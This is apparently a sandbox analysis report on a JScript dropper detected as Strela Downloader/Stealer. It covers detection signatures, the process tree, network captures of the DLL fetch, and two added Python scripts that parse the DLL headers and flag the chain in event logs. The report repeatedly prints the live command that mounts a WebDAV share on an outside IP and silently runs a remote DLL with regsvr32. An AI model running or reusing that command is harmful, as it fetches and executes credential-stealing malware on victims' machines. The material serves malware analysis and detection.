Windows Analysis Report
126484723232027823.js

Overview

General Information

Sample name: 126484723232027823.js
Analysis ID: 1576785
MD5: 09024cb4c452f96fe5b6045e198092ba
SHA1: 53f924039e79576a5b2e9b90e3c11c1116e933eb
SHA256: 0ff304716b215d4fadbf9fee1be5d717c454a09f6bdbe6e42e29995d969964e8
Tags: js, StrelaStealer, user-lowmal3

Detection

Detected families: Strela Downloader, Strela Stealer
Score: 88 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

JScript performs obfuscated calls to suspicious functions
Yara detected Strela Downloader
Yara detected Strela Stealer
Gathers information about network shares
Opens network shares
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: WScript or CScript Dropper
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality to query locales information (e.g. system language)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Program does not show much activity (idle)
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process
Sigma detected: Scripting/CommandLine Process Spawned Regsvr32
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • wscript.exe (PID: 3144 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 3876 cmdline: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1088 cmdline: cmd /c net use \\193.143.1.231@8888\davwwwroot\ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • net.exe (PID: 4832 cmdline: net use \\193.143.1.231@8888\davwwwroot\ MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
      • cmd.exe (PID: 6768 cmdline: cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • regsvr32.exe (PID: 3144 cmdline: regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
  • cleanup
No configs have been found
Source | Rule | Description | Author
0000000B.00000002.2271164628.00007FF8B7E10000.00000004.00000001.01000000.00000007.sdmp | JoeSecurity_StrelaStealer | Yara detected Strela Stealer | Joe Security
0000000B.00000002.2270841882.00000000024B1000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_StrelaStealer | Yara detected Strela Stealer | Joe Security
Process Memory Space: wscript.exe PID: 3144 | JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security
Process Memory Space: regsvr32.exe PID: 3144 | JoeSecurity_StrelaStealer | Yara detected Strela Stealer | Joe Security

Source | Rule | Description | Author
11.2.regsvr32.exe.7ff8b7e00000.0.unpack | JoeSecurity_StrelaStealer | Yara detected Strela Stealer | Joe Security

Source | Rule | Description | Author
amsi64_3144.amsi.csv | JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security

              System Summary

Source: Threat created | Author: Perez Diego (@darkquassar), oscd.community
  Data: EventID: 8, SourceImage: C:\Windows\System32\regsvr32.exe, SourceProcessId: 3144, StartAddress: 24BBDB0, TargetImage: C:\Windows\System32\wscript.exe, TargetProcessId: 3144
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community
  Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js", ProcessId: 3144, ProcessName: wscript.exe
Source: Network Connection | Author: Florian Roth (Nextron Systems)
  Data: DestinationIp: 193.143.1.231, DestinationIsIpv6: false, DestinationPort: 8888, EventID: 3, Image: C:\Windows\System32\net.exe, Initiated: true, ProcessId: 4832, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86')
  Data: Command: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 3144, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll, ProcessId: 3876, ProcessName: cmd.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
  Data: Command: regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll, CommandLine: regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6768, ParentProcessName: cmd.exe, ProcessCommandLine: regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll, ProcessId: 3144, ProcessName: regsvr32.exe
Source: Process started | Author: Michael Haag
  Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js", ProcessId: 3144, ProcessName: wscript.exe
Source: Process started | Author: frack113
  Data: Command: net use \\193.143.1.231@8888\davwwwroot\, CommandLine: net use \\193.143.1.231@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd /c net use \\193.143.1.231@8888\davwwwroot\, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1088, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\193.143.1.231@8888\davwwwroot\, ProcessId: 4832, ProcessName: net.exe
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems)
  Data: Command: net use \\193.143.1.231@8888\davwwwroot\, CommandLine: net use \\193.143.1.231@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd /c net use \\193.143.1.231@8888\davwwwroot\, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1088, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\193.143.1.231@8888\davwwwroot\, ProcessId: 4832, ProcessName: net.exe
              No Suricata rule has matched
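The Sigma hits above describe one delivery chain: wscript.exe runs the script, spawns cmd.exe, mounts a WebDAV share with net use and then has regsvr32 /s load a DLL straight from that UNC path. Two details matter for detection logic. First, the @8888 inside the UNC path is the WebDAV mini-redirector's port syntax (SMB shares never carry an @port component), so both the share mount and the module load travel over HTTP to a non-standard port; the Microsoft-WebDAV-MiniRedir GET later in the report confirms this. Second, the "Rare Remote Thread Creation" hit names regsvr32.exe as source and wscript.exe as target with the same PID, 3144, and the process tree lists both processes under that PID. One PID cannot be both ends of a remote thread, so the plausible reading is PID reuse after wscript.exe exited (the report's own "Thread injection ... no activity detected" line agrees), and a detection should not escalate it as injection. The Python below is an added example, not part of the Joe Sandbox report: the event dicts are constructed from the command lines, PIDs, IP and port shown here, and the Sysmon-style field layout is an assumption.

```python
import re

# Constructed sample events. The command lines, PIDs, images, IP and port are the
# ones this report shows; the dict layout (Sysmon-style EventID 1/3/8 fields) is
# an assumption, not a real log export.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 3144, "Image": "C:\\Windows\\System32\\wscript.exe", "ParentImage": "",
     "CommandLine": 'C:\\Windows\\System32\\WScript.exe "C:\\Users\\user\\Desktop\\126484723232027823.js"'},
    {"EventID": 1, "ProcessId": 3876, "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\System32\\wscript.exe",
     "CommandLine": '"C:\\Windows\\System32\\cmd.exe" /c cmd /c net use \\\\193.143.1.231@8888\\davwwwroot\\'
                    "&&cmd /c regsvr32 /s \\\\193.143.1.231@8888\\davwwwroot\\140341625623863.dll"},
    {"EventID": 1, "ProcessId": 4832, "Image": "C:\\Windows\\System32\\net.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "net use \\\\193.143.1.231@8888\\davwwwroot\\"},
    {"EventID": 1, "ProcessId": 3144, "Image": "C:\\Windows\\System32\\regsvr32.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "regsvr32 /s \\\\193.143.1.231@8888\\davwwwroot\\140341625623863.dll"},
    {"EventID": 3, "ProcessId": 4832, "Image": "C:\\Windows\\System32\\net.exe",
     "DestinationIp": "193.143.1.231", "DestinationPort": 8888, "Protocol": "tcp"},
    {"EventID": 8, "SourceProcessId": 3144, "SourceImage": "C:\\Windows\\System32\\regsvr32.exe",
     "TargetProcessId": 3144, "TargetImage": "C:\\Windows\\System32\\wscript.exe"},
]

# \\host@port\... (or \\host@SSL@port\...) is the WebDAV mini-redirector's UNC
# syntax; an SMB share path never carries an @port component.
WEBDAV_UNC = re.compile(r"\\\\([\w.\-]+)(?:@SSL)?@(\d{1,5})\\", re.IGNORECASE)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
UNC_LOADERS = {"regsvr32.exe", "rundll32.exe", "mshta.exe"}
SHARE_PORTS = {445}  # the only port an ordinary net use over SMB needs

def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def check_process_create(ev: dict) -> list:
    img, parent, cl = image_name(ev["Image"]), image_name(ev.get("ParentImage", "")), ev["CommandLine"]
    findings = []
    m = WEBDAV_UNC.search(cl)
    if parent in SCRIPT_HOSTS and img == "cmd.exe":
        findings.append("script host spawned cmd.exe")
    if m:
        findings.append(f"WebDAV UNC path to {m.group(1)}:{m.group(2)} in command line")
    if img == "net.exe" and re.search(r"\bnet\s+use\b", cl, re.I) and m:
        findings.append("net use mounts a WebDAV share on an explicit port")
    if img in UNC_LOADERS and "\\\\" in cl:
        findings.append(f"{img} loads a module from a UNC path")
    if img == "regsvr32.exe" and re.search(r"(?:^|\s)/s(?:\s|$)", cl, re.I):
        findings.append("regsvr32 /s suppresses error dialogs")
    return findings

def check_network(ev: dict) -> list:
    if image_name(ev["Image"]) == "net.exe" and ev["DestinationPort"] not in SHARE_PORTS:
        return [f"net.exe connected to {ev['DestinationIp']}:{ev['DestinationPort']} (not SMB)"]
    return []

def check_remote_thread(ev: dict) -> list:
    src, dst = image_name(ev["SourceImage"]), image_name(ev["TargetImage"])
    if ev["SourceProcessId"] == ev["TargetProcessId"] and src != dst:
        # One PID cannot be both sides of a remote thread: the PID was reused after the
        # target exited. Correlate with process-end events instead of escalating.
        return [f"PID reuse: {src} and {dst} share PID {ev['SourceProcessId']}, not injection"]
    if src != dst:
        return [f"remote thread from {src} into {dst}"]
    return []

CHECKS = {1: check_process_create, 3: check_network, 8: check_remote_thread}

def analyze(events: list) -> dict:
    """Map event index -> findings, only for events that produced any."""
    out = {}
    for i, ev in enumerate(events):
        hits = CHECKS.get(ev["EventID"], lambda _: [])(ev)
        if hits:
            out[i] = hits
    return out

if __name__ == "__main__":
    for i, hits in analyze(SAMPLE_EVENTS).items():
        print(f"event {i} (EventID {SAMPLE_EVENTS[i]['EventID']}):", "; ".join(hits))
```

The script-host check alone would also fire on benign logon scripts; the combination that is specific to this chain is a WebDAV UNC with an explicit port appearing in a net use and again in a regsvr32 command line within the same process tree, which is what the second and fourth sample events produce.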


              Networking

Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 8888
Source: unknown | Network traffic detected: HTTP traffic on port 8888 -> 49704
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 8888
Source: unknown | Network traffic detected: HTTP traffic on port 8888 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 8888 -> 49706
Source: unknown | Network traffic detected: HTTP traffic on port 8888 -> 49707
Source: unknown | Network traffic detected: HTTP traffic on port 8888 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 8888
Source: unknown | Network traffic detected: HTTP traffic on port 8888 -> 49709
Source: global traffic | TCP traffic: 192.168.2.5:49704 -> 193.143.1.231:8888
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK
  Server: nginx/1.22.1
  Date: Tue, 17 Dec 2024 14:11:14 GMT
  Content-Type: application/octet-stream
  Content-Length: 418816
  Connection: keep-alive
  Accept-Ranges: bytes
  Etag: "1811fc31dcbf3e9066400"
  Last-Modified: Tue, 17 Dec 2024 14:10:22 GMT
  Data Raw (16 bytes per row; every captured byte after the last row shown is 00):
  4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00
  00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00
  0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68
  69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f
  74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20
  6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 04 00
  19 51 61 67 00 00 00 00 00 00 00 00 f0 00 22 20
  0b 02 0e 00 00 d2 00 00 00 8e 05 00 00 00 00 00
  f0 12 00 00 00 10 00 00 00 00 00 80 01 00 00 00
  00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00
  06 00 00 00 00 00 00 00 00 a0 06 00 00 04 00 00
  00 00 00 00 02 00 60 00 00 00 10 00 00 00 00 00
  00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00
  00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00
  00 f0 00 00 57 00 00 00 00 00 00 00 00 00 00 00
  00 00 00 00 00 00 00 00 00 90 06 00 18 00 00 00
  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  2e 74 65 78 74 00 00 00 11 d1 00 00 00 10 00 00
  00 d2 00 00 00 04 00 00 00 00 00 00 00 00 00 00
  00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00
  78 00 00 00 00 f0 00 00 00 02 00 00 00 d6 00 00
  00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40
  2e 64 61 74 61 00 00 00 84 88 05 00 00 00 01 00
  00 8a 05 00 00 d8 00 00 00 00 00 00 00 00 00 00
  00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00
  18 00 00 00 00 90 06 00 00 02 00 00 00 62 06 00
  00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40
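The response above is the DLL that regsvr32 fetches over WebDAV; the report prints the raw bytes but does not decode them, and they contain everything needed for a first triage. The Python below is an added example, not part of the Joe Sandbox report: it embeds those bytes (transcribed from the Data Raw dump, first 0x220 bytes) and parses the DOS, COFF, PE32+ optional and section headers with only the standard library. From the fields alone the file is a 64-bit DLL whose link timestamp falls on 2024-12-17, the same day as the Last-Modified header; it has an export directory but no import directory; .data holds about 87% of the 418816 bytes; and the last section ends exactly at Content-Length, so there is no overlay. What the missing import table and the large writable section suggest about a packed payload is a heuristic and is labelled as such in the code.

```python
import struct
from datetime import datetime, timezone

# First 0x220 bytes of the DLL as captured in the report's HTTP response
# (transcribed from the "Data Raw" dump; every later captured byte is 00).
CAPTURED_HEX = (
    "4d5a7800010000000400000000000000" "00000000000000004000000000000000"
    "00000000000000000000000000000000" "00000000000000000000000078000000"
    "0e1fba0e00b409cd21b8014ccd215468" "69732070726f6772616d2063616e6e6f"
    "742062652072756e20696e20444f5320" "6d6f64652e2400005045000064860400"
    "195161670000000000000000f0002220" "0b020e0000d20000008e050000000000"
    "f0120000001000000000008001000000" "00100000000200000600000000000000"
    "060000000000000000a0060000040000" "00000000020060000000100000000000"
    "00100000000000000000100000000000" "00100000000000000000000010000000"
    "00f00000570000000000000000000000" "00000000000000000090060018000000"
    + "00" * 96 +  # data directories 4..15, all empty in the capture
    "2e7465787400000011d1000000100000" "00d20000000400000000000000000000"
    "00000000200000602e72646174610000" "7800000000f000000002000000d60000"
    "00000000000000000000000040000040" "2e646174610000008488050000000100"
    "008a050000d800000000000000000000" "00000000400000c02e70646174610000"
    "18000000009006000002000000620600" "00000000000000000000000040000040"
)
CONTENT_LENGTH = 418816  # Content-Length header of the same response

DLL_FLAG, NX_COMPAT, SEC_WRITE = 0x2000, 0x0100, 0x80000000
DIR_NAMES = ["export", "import", "resource", "exception"]

def parse_pe_headers(data: bytes) -> dict:
    """Parse DOS, COFF, PE32+ optional and section headers from a file prefix."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine, nsect, tstamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    if struct.unpack_from("<H", data, opt)[0] != 0x20B:
        raise ValueError("only PE32+ is handled here")
    entry, = struct.unpack_from("<I", data, opt + 16)
    image_base, = struct.unpack_from("<Q", data, opt + 24)
    size_of_image, size_of_headers = struct.unpack_from("<II", data, opt + 56)
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    n_dirs, = struct.unpack_from("<I", data, opt + 108)
    dirs = {(DIR_NAMES[i] if i < len(DIR_NAMES) else f"dir{i}"): struct.unpack_from("<II", data, opt + 112 + 8 * i)
            for i in range(n_dirs)}
    sections = []
    for i in range(nsect):  # section table follows the optional header
        off = opt + opt_size + 40 * i
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, off)
        sec_chars, = struct.unpack_from("<I", data, off + 36)
        sections.append({"name": name.rstrip(b"\0").decode(), "vsize": vsize, "va": va,
                         "raw_size": raw_size, "raw_ptr": raw_ptr, "chars": sec_chars})
    return {"machine": machine, "sections": sections, "timestamp": tstamp,
            "timestamp_utc": datetime.fromtimestamp(tstamp, timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
            "characteristics": chars, "entry": entry, "image_base": image_base,
            "size_of_image": size_of_image, "size_of_headers": size_of_headers,
            "subsystem": subsystem, "dll_characteristics": dll_chars, "dirs": dirs}

def assess(hdr: dict, content_length: int) -> list:
    """Triage notes from header facts; the 'likely' lines are heuristics."""
    notes = []
    if hdr["characteristics"] & DLL_FLAG:
        notes.append("DLL image (consistent with delivery via regsvr32)")
    if hdr["dirs"]["import"] == (0, 0):
        notes.append("no import directory: imports resolved at runtime, likely a packed/obfuscated loader")
    if hdr["dirs"]["export"][1]:
        notes.append("export directory present (regsvr32 calls DllRegisterServer from it)")
    if not hdr["dll_characteristics"] & NX_COMPAT:
        notes.append("NX_COMPAT not set")
    biggest = max(hdr["sections"], key=lambda s: s["raw_size"])
    share = biggest["raw_size"] / content_length
    if biggest["chars"] & SEC_WRITE and share > 0.5:
        notes.append(f"{biggest['name']} is writable and holds {share:.0%} of the file: likely an embedded encrypted payload")
    end = max(s["raw_ptr"] + s["raw_size"] for s in hdr["sections"])
    notes.append("no overlay: last section ends exactly at Content-Length" if end == content_length
                 else f"overlay or truncation: sections end at {end:#x}, Content-Length is {content_length:#x}")
    return notes

if __name__ == "__main__":
    h = parse_pe_headers(bytes.fromhex(CAPTURED_HEX))
    print(f"machine {h['machine']:#x}, linked {h['timestamp_utc']} UTC, entry {h['entry']:#x}, base {h['image_base']:#x}")
    for s in h["sections"]:
        print(f"  {s['name']:<7} va {s['va']:#08x} raw {s['raw_ptr']:#08x}+{s['raw_size']:#x} chars {s['chars']:#010x}")
    print("\n".join(assess(h, CONTENT_LENGTH)))
```

Because the response was captured from the wire, the same parser can be pointed at the body of any similar WebDAV fetch in a PCAP; the only input it needs is the first SizeOfHeaders bytes, which here is 0x400.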
Source: Joe Sandbox View | ASN Name: BITWEB-ASRU
Source: unknown | TCP traffic detected without corresponding DNS query: 193.143.1.231 (this line appears 50 times in the report)
Source: global traffic | HTTP traffic detected: GET /140341625623863.dll HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045
  translate: f
  Host: 193.143.1.231:8888
Source: net.exe, 00000005.00000002.2185942636.0000013018382000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://193.143.1.231/
Source: net.exe, 00000005.00000002.2185942636.0000013018382000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://193.143.1.231/0I
Source: net.exe, 00000005.00000002.2185942636.00000130183A7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://193.143.1.231/bcf3ed6d7050e4
Source: net.exe, 00000005.00000002.2185942636.0000013018382000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://193.143.1.231/dI
Source: net.exe, 00000005.00000002.2185942636.0000013018368000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000002.2185942636.0000013018382000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://193.143.1.231:8888/

              Spam, unwanted Advertisements and Ransom Demands

Source: Yara match | File source: amsi64_3144.amsi.csv, type: OTHER
Source: Yara match | File source: Process Memory Space: wscript.exe PID: 3144, type: MEMORYSTR

              System Summary

Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\regsvr32.exe | Code functions: 11_2_024B9A30, 11_2_024BBDB0, 11_2_024EDA00, 11_2_024F2B28, 11_2_024E6F30, 11_2_024EA391, 11_2_024F98E8, 11_2_024F29A4
Source: 126484723232027823.js | Initial sample: Strings found which are bigger than 50
Source: classification engine | Classification label: mal88.rans.troj.spyw.evad.winJS@12/0@0/1
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5688:120:WilError_03
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll
Source: C:\Windows\System32\wscript.exe | Sections loaded (in order): version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, jscript.dll, iertutil.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, scrrun.dll, mpr.dll, windows.storage.dll, propsys.dll, edputil.dll, urlmon.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\net.exe | Sections loaded (in order): mpr.dll, wkscli.dll, netutils.dll, samcli.dll, srvcli.dll, iphlpapi.dll, drprov.dll, winsta.dll, ntlanman.dll, davclnt.dll, davhlpr.dll, winhttp.dll, ondemandconnroutehelper.dll, dhcpcsvc6.dll, dhcpcsvc.dll, webio.dll, mswsock.dll, winnsi.dll, sspicli.dll, wininet.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, urlmon.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe | Sections loaded (in order): apphelp.dll, aclayers.dll, sfc.dll, sfc_os.dll, kernel.appcore.dll, uxtheme.dll, wininet.dll, textshaping.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, coremessaging.dll, wintypes.dll, wintypes.dll, wintypes.dll
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: C:\Windows\System32\wscript.exe | Automated click: OK
Source: C:\Windows\System32\regsvr32.exe | Automated click: OK
Source: Window Recorder | Window detected: More than 3 window changes detected

              Data Obfuscation

Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: WScript.Shell");IWshShell3.Run("cmd /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s", "0", "false")
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_024FEEFE push ecx; retf 003Fh (at 11_2_024FEF5E)
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_024FB690 push esp; iretd (at 11_2_024FB691)

              Hooking and other Techniques for Hiding and Protection

Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 8888
Source: unknown | Network traffic detected: HTTP traffic on port 8888 -> 49704
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 8888
Source: unknown | Network traffic detected: HTTP traffic on port 8888 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 8888 -> 49706
Source: unknown | Network traffic detected: HTTP traffic on port 8888 -> 49707
Source: unknown | Network traffic detected: HTTP traffic on port 8888 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 8888
Source: unknown | Network traffic detected: HTTP traffic on port 8888 -> 49709
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (3 times)
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\net.exe TID: 7100 | Thread sleep time: -30000s >= -30000s
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: net.exe, 00000005.00000002.2185942636.0000013018318000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000002.2185942636.0000013018382000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
